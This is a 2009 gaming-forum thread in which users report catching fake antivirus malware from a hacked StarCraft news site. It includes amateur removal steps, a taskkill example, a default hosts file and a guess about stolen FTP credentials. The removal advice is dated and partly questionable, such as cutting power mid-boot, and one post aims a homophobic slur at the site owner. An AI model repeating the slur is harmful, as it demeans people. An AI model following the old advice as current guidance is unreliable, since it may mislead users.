Profile Joined March 2009
Australia18 Posts
September 27 2009 03:30 GMT
#61
A number of those could be the "Afreeka" problem they reported originally. But you are correct; they need to get their act into gear.
When you do something right, people wont notice youve done anything at all.
ChaoSbringer
Profile Blog Joined April 2008
Australia1382 Posts
September 27 2009 06:12 GMT
#62
Got this Total Security crap, very annoyed, but I dled malwarebytes & it's scanning now.

The item in your system tray (for me) that was running Total Security was a bunch of numbers like 19242163 or something like that.

I know this isn't Artosis' fault, but I'm pretty annoyed about this, perhaps you guys should edit http://www.teamliquid.net/forum/viewmessage.php?topic_id=101582 telling people not to use the website untill it's fixed, because I went there to look at one of the tutorials, and then got infected.
CongoJack
Profile Joined February 2009
Canada417 Posts
September 27 2009 06:23 GMT
#63
Hmm I will definitely be steering clear of scforall from now on. Hopefully they get their shit sorted out but either way I don't think I will be going back there especially since it looks like its an on going problem since 2008...
Alphonsse
Profile Blog Joined March 2009
United States518 Posts
Last Edited: 2009-09-27 07:52:43
September 27 2009 07:48 GMT
#64
It sucks cause I was looking forward to WCG USA coverage from there.

I got "total security 2009" there about 2 weeks ago. Had no idea it was from scforall till people brought it up in this thread. I wouldn't have pressed 'yes' to any download, but I do remember times when adobe reader would open unexpectedly.
Patriot.dlk
Profile Blog Joined October 2004
Sweden5462 Posts
September 27 2009 08:31 GMT
#65
To be fair I just wanted so that I wasn't infected. And when I try to browse to scforall my firefox terminates instantly
Liquid`Jinro
Profile Blog Joined September 2002
Sweden33719 Posts
September 27 2009 12:05 GMT
#66
I was told they have now taken the site offline until they can fix it. I'm not gonna actually click the link to confirm this myself, but should be true
Moderatortell the guy that interplanatar interaction is pivotal to terrans variety of optionitudals in the pre-midgame preperatories as well as the protosstinal deterriggation of elite zergling strikes - Stimey n | Formerly FrozenArbiter
StalkerSC
Profile Blog Joined April 2009
Canada378 Posts
September 27 2009 12:56 GMT
#67
@FrozenArbiter, you are correct there is a note on the site...not down yet

If I went to the site but didn't DL the fake adobe and the auto downloading shit..I shouldn't be infected right? Norton Antivirus is what I have, all up to date.
IIf your good at Starcraft, Your good at life. - Artosis
Skeggaba
Profile Blog Joined April 2009
Korea (South)1556 Posts
September 27 2009 14:34 GMT
#68
Gah, cannon access the site.. .was hoping to end this sunday with some weekly SC updates... oh well
Bisu[about JD]=I was scared (laughs). The force emanating from his facial expression was so manly that I was even a little jealous.
aKshun
Profile Joined March 2009
Australia18 Posts
September 27 2009 21:49 GMT
#69
If I went to the site but didn't DL the fake adobe and the auto downloading shit..I shouldn't be infected right? Norton Antivirus is what I have, all up to date.


I believe you should be fine. Norton should have the signatures for the Pidief malware that was being delivered and they usually require some user input before your actually infected. Clean out your temporary internet files and cookies and if you like perform a scan with malwarebytes.org
When you do something right, people wont notice youve done anything at all.
StalkerSC
Profile Blog Joined April 2009
Canada378 Posts
September 27 2009 21:51 GMT
#70
On September 28 2009 06:49 aKshun wrote:
Show nested quote +
If I went to the site but didn't DL the fake adobe and the auto downloading shit..I shouldn't be infected right? Norton Antivirus is what I have, all up to date.


I believe you should be fine. Norton should have the signatures for the Pidief malware that was being delivered and they usually require some user input before your actually infected. Clean out your temporary internet files and cookies and if you like perform a scan with malwarebytes.org



Thank you very much^^
IIf your good at Starcraft, Your good at life. - Artosis
d(O.o)a
Profile Blog Joined June 2008
Canada5066 Posts
September 27 2009 22:48 GMT
#71
What a shame I was enjoying SCForAll
Hi.
iSiN
Profile Blog Joined March 2009
United States1075 Posts
September 27 2009 23:17 GMT
#72
On September 27 2009 10:43 Manifesto7 wrote:
I blame this on the LastShadow interview.


roflmao

wait is plexa going to close this thread now too you said his name mani!
Grouty @HoN/PCKJ <--<333 || Jaedong Fan Cafe GFX
jimminy_kriket
Profile Blog Joined February 2007
Canada5501 Posts
September 29 2009 19:34 GMT
#73
Seriously fuck scforall god damn it i havent had a virus in like a year now i got this fucking popup telling me i have a virus (which is obv the virus itself) fuckfuckfuckfuck Fuckkkkkkkkkkkkkkkkkkkkkkkkkk
life of lively to live to life of full life thx to shield battery
LuckyFool
Profile Blog Joined June 2007
United States9015 Posts
September 29 2009 19:36 GMT
#74
rofl so shitty.

nice ghost btw jim I see u've finally seen the light.
Deleriux
Profile Joined September 2009
10 Posts
September 29 2009 21:22 GMT
#75
They removed the problem code but didnt fix the root cause. 12 hours later they are hacked again...
jimminy_kriket
Profile Blog Joined February 2007
Canada5501 Posts
September 29 2009 22:14 GMT
#76
This thing raped my hosts file, took me a while to figure it out
life of lively to live to life of full life thx to shield battery
Empire
Profile Joined September 2009
22 Posts
September 30 2009 12:59 GMT
#77
I ended up getting this. If you have IE7, hopefully it was able to atleast stop the automatic download. I was using IE6.

Anyways, here is the steps I did to get rid of it:

1. I yanked my power cord out of the PC to avoid windows saving the settings. Yes I know this is a bad taboo, but holding down the power button will cause windows to start saving settings.

2. Did a Last known good configuration reboot (F8 on startup). The last known good config still has the virus inside it, its just not fully installed yet.

3. Upon boot, immediately get a Task manager up and start looking as the processes as they load. One will load that is all Numbers (Like 1245783.exe) Immediately kill this process. Once this process is killed the virus will stop installing during this boot. From here you can proceed with removal

4. Malwarebytes (www.malwarebytes.org) is the software I used for removal. You also should do a Start---Run--MSconfig and remove the program from the startup tab just incase you lose power before malwarebytes finishes.



Now, if you weren't able to get to the task manager fast enough and the virus installs, here are some steps to try and help:

1. Open up a command prompt and "Tasklist" This is the same screen as your task manager, but in a CLI format. If you can easily tell which program is hosting the virus, you can do a "Taskkill" command. I would format it like this:
C:\taskkill /F /IM program1.exe /IM program2.exe /IM program3.exe

This will allow you to kill all bad processes at once and will stop them from spawning more. Once all the viruses are stopped running, you can run Malwarebytes to remove the rest.

I would also recommend using Combofix (http://www.bleepingcomputer.com/combofix/how-to-use-combofix). The guide is pretty self explaintory



Also, as people have mentioned, this virus does rape your host file. Unless you do some weird networking in your house, or you happen to get this virus on a work PC, I would just erase everything in the file and you should be good to go. Or, you can always just copy in the following from notepad:

# Copyright (c) 1993-1999 Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
#
# This file contains the mappings of IP addresses to host names. Each
# entry should be kept on an individual line. The IP address should
# be placed in the first column followed by the corresponding host name.
# The IP address and the host name should be separated by at least one
# space.
#
# Additionally, comments (such as these) may be inserted on individual
# lines or following the machine name denoted by a '#' symbol.
#
# For example:
#
# 102.54.94.97 rhino.acme.com # source server
# 38.25.63.10 x.acme.com # x client host

127.0.0.1 localhost




I work on PCs for a living, but virus removal is NOT one of my best traits, but if anyone has questions I will try to answer them. This community is so large that there is most likely several people a lot more knowledgeable than me here to help as well.
StorrZerg
Profile Blog Joined February 2008
United States13919 Posts
September 30 2009 13:06 GMT
#78
I'm glad i've been away from the site for a bit.

but i can't wait for it to get fixed so i can watch the interviews at wcg (so epic)
Hwaseung Oz fan for life. Swing out, always swing out.
Empire
Profile Joined September 2009
22 Posts
September 30 2009 13:10 GMT
#79
I just checked it and its off of Google's block and firefox lets me go to it just fine now. I am not sure if their root cause of the hacks was fixed, but atleast I can watch some of the WCG stuff they've loaded so far
StorrZerg
Profile Blog Joined February 2008
United States13919 Posts
September 30 2009 13:34 GMT
#80
On September 30 2009 22:10 Empire wrote:
I just checked it and its off of Google's block and firefox lets me go to it just fine now. I am not sure if their root cause of the hacks was fixed, but atleast I can watch some of the WCG stuff they've loaded so far


Hope so, but i'm waiting for a mod or someone to confirm that its safe lol
Hwaseung Oz fan for life. Swing out, always swing out.
ceaRshaf
Profile Joined August 2009
Romania4926 Posts
September 30 2009 14:27 GMT
#81
Well, i can't acces it no more. Maybe it's just me.
Mess with the best, die like the rest.
aKshun
Profile Joined March 2009
Australia18 Posts
October 01 2009 08:17 GMT
#82
On September 30 2009 22:34 StorrZerg wrote:
Show nested quote +
On September 30 2009 22:10 Empire wrote:
I just checked it and its off of Google's block and firefox lets me go to it just fine now. I am not sure if their root cause of the hacks was fixed, but atleast I can watch some of the WCG stuff they've loaded so far


Hope so, but i'm waiting for a mod or someone to confirm that its safe lol


Not sure what my word is worth. But the website is clean on a cookies-disabled browser.

It also no longer has the offending code at the bottom of its page source. Was hit with neither False-Flash request or notification from my AV
When you do something right, people wont notice youve done anything at all.
nicoaldo
Profile Joined March 2009
Argentina939 Posts
October 01 2009 17:54 GMT
#83
Google is not blocking it anymore, it looks like. I entered the page with cookies and auto downloads disabled and didn´t have any problem. It didn´t ask me to download stuff or anything suspicious.
PokePill
Profile Blog Joined March 2009
United States1048 Posts
Last Edited: 2009-10-01 18:08:07
October 01 2009 18:06 GMT
#84
Anyone have any clue how a site like this gets hacked so easily to the point where people can upload files and run scripts?

Is it XSS or SQL injection from a poorly managed server database design or what?
Integra
Profile Blog Joined January 2008
Sweden5626 Posts
October 01 2009 18:14 GMT
#85
On October 02 2009 03:06 PokePill wrote:
Anyone have any clue how a site like this gets hacked so easily to the point where people can upload files and run scripts?

Is it XSS or SQL injection from a poorly managed server database design or what?


It was done from an add/message created by a third party on the website using javascript.
"Dark Pleasure" | | I survived the Locust war of May 3, 2014
Deleriux
Profile Joined September 2009
10 Posts
Last Edited: 2009-10-01 21:42:17
October 01 2009 21:39 GMT
#86
On October 02 2009 03:06 PokePill wrote:
Anyone have any clue how a site like this gets hacked so easily to the point where people can upload files and run scripts?

Is it XSS or SQL injection from a poorly managed server database design or what?


Its much simpler than that - the code is appended to the end of the main files. The attacker has write access to them.

Normally thats due to stolen FTP credentials. How that happens - well - generally keyloggers on machines that have access to FTP on scforall.com. Most of the places one gets these keyloggers added to your system is through sites of a less than dignified nature .

These type of attacks are sourced from botnets (keylogger sends FTP details to a botnet, a few hours later the botnet logs in to add its malware to the site). In most cases what happens is the botnet keeps resubmitting its hacks to the site to reverse the affect where a webmaster has removed the bad lines of code from the website.

I see this all the time in my line of work. I emailed the site maintainers with curative/preventative measures to help stop this - I gather that Artosis is not responsible for this - it appears he merely updates the site content via the in built control panels for the website.

Needless to say if they dont clear out the malware on systems that have FTP access to this site the site will continue to get infected - regardless of how often they change the FTP password.

So - be warned - the site might be OK now but infected again tomorrow. We'll just have to wait and get a reliable confirmation that the system that has caused all these problems is cleared and the problem is rectified.

I'm not familiar with Korean ISPs but if they tend to hand out static IP addresses it makes it far simpler to just firewall off FTP access to scforall.com to only a list of authorized IPs.
Eukarya
Profile Joined April 2009
United States29 Posts
October 01 2009 21:58 GMT
#87
I get the same message popup from GosuGamers too. I just clicked "Don't Install" every time it came up and could navigate the site just fine.

Is this coming up on any other SC sites?
Flaccid
Profile Blog Joined August 2006
8835 Posts
Last Edited: 2009-10-06 16:30:26
October 06 2009 16:21 GMT
#88
Site is still pooched. Which is awesome because Artosis keeps posting that it's fixed and "not to worry". By not worrying you'll be downloading some nice malware to your pc simply by loading the site in your browser.

Don't be a faggot Artosis. Take your site down and stop spamming links until you get this fixed. I'd rather get fucking Rick-Rolled.

edit: here is what scforall installs on your computer and how to get rid of it
I'd rather have a bottle in front of me than a frontal lobotomy
Normal
Please log in or register to reply.
Live Events Refresh
BSL20 Non-Korean Champi…
18:00
RO8 Round Robin Group - Day 2
Bonyth vs Dewalt
QiaoGege vs Dewalt
Hawk vs Bonyth
Sziky vs Fengzi
Mihu vs Zhanhun
QiaoGege vs Zhanhun
Fengzi vs Mihu
ZZZero.O229
LiquipediaDiscussion
[ Submit Event ]
Live Streams
Refresh
StarCraft 2
ProTech70
StarCraft: Brood War
Artosis 371
ZZZero.O 229
LaStScan 136
Aegong 122
Dota 2
syndereN349
canceldota127
League of Legends
Grubby5117
Dendi1188
Counter-Strike
fl0m1800
chrisJcsgo99
Super Smash Bros
hungrybox597
Heroes of the Storm
Khaldor349
Other Games
summit1g14007
Pyrionflax104
ViBE91
ROOTCatZ62
Sick56
Maynarde43
Organizations
Other Games
gamesdonequick5405
EGCTV2824
BasetradeTV31
StarCraft 2
Blizzard YouTube
StarCraft: Brood War
BSLTrovo
sctven
[ Show 19 non-featured ]
StarCraft 2
• Berry_CruncH188
• musti20045 44
• davetesta28
• Migwel
• sooper7s
• AfreecaTV YouTube
• intothetv
• Kozan
• IndyKCrew
• LaughNgamezSOOP
StarCraft: Brood War
• blackmanpl 13
• Pr0nogo 8
• STPLYoutube
• ZZZeroYoutube
• BSLYoutube
Dota 2
• masondota22205
League of Legends
• Doublelift4507
Other Games
• imaqtpie2420
• Scarra1982
Upcoming Events
Wardi Open
12h 42m
Replay Cast
1d 11h
WardiTV European League
1d 17h
PiGosaur Monday
2 days
uThermal 2v2 Circuit
2 days
Replay Cast
3 days
The PondCast
3 days
Replay Cast
4 days
Epic.LAN
4 days
CranKy Ducklings
5 days
[ Show More ]
Epic.LAN
5 days
BSL20 Non-Korean Champi…
5 days
Bonyth vs Sziky
Dewalt vs Hawk
Hawk vs QiaoGege
Sziky vs Dewalt
Mihu vs Bonyth
Zhanhun vs QiaoGege
QiaoGege vs Fengzi
Sparkling Tuna Cup
6 days
Online Event
6 days
BSL20 Non-Korean Champi…
6 days
Bonyth vs Zhanhun
Dewalt vs Mihu
Hawk vs Sziky
Sziky vs QiaoGege
Mihu vs Hawk
Zhanhun vs Dewalt
Fengzi vs Bonyth
Liquipedia Results

Completed

KCM Race Survival 2025 Season 2
HSC XXVII
NC Random Cup

Ongoing

JPL Season 2
BSL 2v2 Season 3
Acropolis #3
CSL 17: 2025 SUMMER
Copa Latinoamericana 4
Jiahua Invitational
2025 ACS Season 2: Qualifier
BSL20 Non-Korean Championship
Championship of Russia 2025
Murky Cup #2
BLAST.tv Austin Major 2025
ESL Impact League Season 7
IEM Dallas 2025
PGL Astana 2025
Asian Champions League '25
BLAST Rivals Spring 2025
MESA Nomadic Masters

Upcoming

CSL Xiamen Invitational
CSL Xiamen Invitational: ShowMatche
2025 ACS Season 2
CSLPRO Last Chance 2025
CSLPRO Chat StarLAN 3
BSL Season 21
K-Championship
RSL Revival: Season 2
SEL Season 2 Championship
uThermal 2v2 Main Event
FEL Cracov 2025
Esports World Cup 2025
Underdog Cup #2
StarSeries Fall 2025
FISSURE Playground #2
BLAST Open Fall 2025
BLAST Open Fall Qual
Esports World Cup 2025
BLAST Bounty Fall 2025
BLAST Bounty Fall Qual
IEM Cologne 2025
FISSURE Playground #1
TLPD

1. ByuN
2. TY
3. Dark
4. Solar
5. Stats
6. Nerchio
7. sOs
8. soO
9. INnoVation
10. Elazer
1. Rain
2. Flash
3. EffOrt
4. Last
5. Bisu
6. Soulkey
7. Mini
8. Sharp
Sidebar Settings...

Advertising | Privacy Policy | Terms Of Use | Contact Us

Original banner artwork: Jim Warren
The contents of this webpage are copyright © 2025 TLnet. All Rights Reserved.